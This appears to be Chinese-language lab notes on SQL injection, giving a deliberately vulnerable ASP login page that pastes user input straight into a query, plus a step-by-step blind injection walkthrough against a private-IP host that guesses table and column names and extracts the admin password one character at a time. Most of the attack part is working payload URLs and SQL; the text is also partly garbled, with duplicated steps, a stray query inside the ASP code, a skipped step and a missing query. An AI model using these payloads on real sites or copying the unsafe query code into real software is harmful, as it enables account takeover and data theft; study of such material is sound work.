login.html
login.asp
参数: http://192.168.10.1/login.asp?pass=test&name=test
原SQL语句:SELECT * FROM data Where uname='test'
1.构造能执行的SQL语句
http://192.168.10.1/login.asp?pass=test&name=test' and 1=1 and 'a'='a
相当于执行SQL语句为SELECT * FROM data Where uname='test' and 1=1 and 'a'='a'
如果执行成功,1=1就是我们可能执行的SQL语句
2.猜表名
将1=1替换 (select count(*) from data)>0
http://192.168.10.1/login.asp?pass=test&name=test' and (select count(*) from data)>0 and 'a'='a
相当于执行SQL语句
SELECT * FROM data Where uname='test' and (select count(*) from data)>0'
(Select count(*) from data where uname='admin' and mid(pass,1,1)<'9')>0
<html>
<head><title>请登录</title></head>
<body>
<div align="center">
<form action="login.asp" method="post">
请输入密码:
<br><br>
用 户:<input name="name" type="textbox">
<br>
密 码:<input name="pass" type="password">
<br>
<input value="登录" type="submit">
</form>
</div>
</body>
</html>
login.asp
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>登录</title>
</head>
<body>
<%
inname=Request("name")
inpass=Request("pass")
set conn=server.createobject("ADODB.CONNECTION")
conn.open "Provider=microsoft.jet.oledb.4.0; Data Source="+server.mappath("/data.db")
sqlstr="SELECT * FROM data Where uname='" & inname & "'"
select * from data where name = 'admin' and 1=1 and 'a'='a'
Set rs=conn.Execute(sqlstr)
if inpass=rs("pass") then
response.write("<h3>登录成功!</h3>")
response.write("用户编号:" & rs("uid") & "<br>")
else
response.write("登录失败!")
end if
Set rs=Nothing
conn.close
%>
</body>
</html>
参数: http://192.168.10.1/login.asp?pass=test&name=test
原SQL语句:SELECT * FROM data Where uname='test'
1.构造能执行的SQL语句
http://192.168.10.1/login.asp?pass=test&name=test' and 1=1 and 'a'='a
相当于执行SQL语句为SELECT * FROM data Where uname='test' and 1=1 and 'a'='a'
如果执行成功,1=1就是我们可能执行的SQL语句
2.猜表名
将1=1替换 (select count(*) from data)>0
http://192.168.10.1/login.asp?pass=test&name=test' and (select count(*) from data)>0 and 'a'='a
相当于执行SQL语句
SELECT * FROM data Where uname='test' and (select count(*) from data)>0'
3.猜用户名字段
(select count(name) from data)>0
4.猜密码字段
(select count(pass) from data)>0
//判断密码长度大于1
(Select count(*) from data where name='admin' and len(pass)>1)>0
//判断密码长度大于10
6.逐位猜密码
//猜测第1位密码是否为数字(Select count(*) from data where uname='admin' and mid(pass,1,1)<'9')>0
//猜测第1位密码是否为字母
(Select count(*) from data where uname='admin' and mid(pass,1,1)>'a')>0//猜测第1位密码是否等于c
(Select count(*) from data where uname='admin' and mid(pass,2,1)='c')>0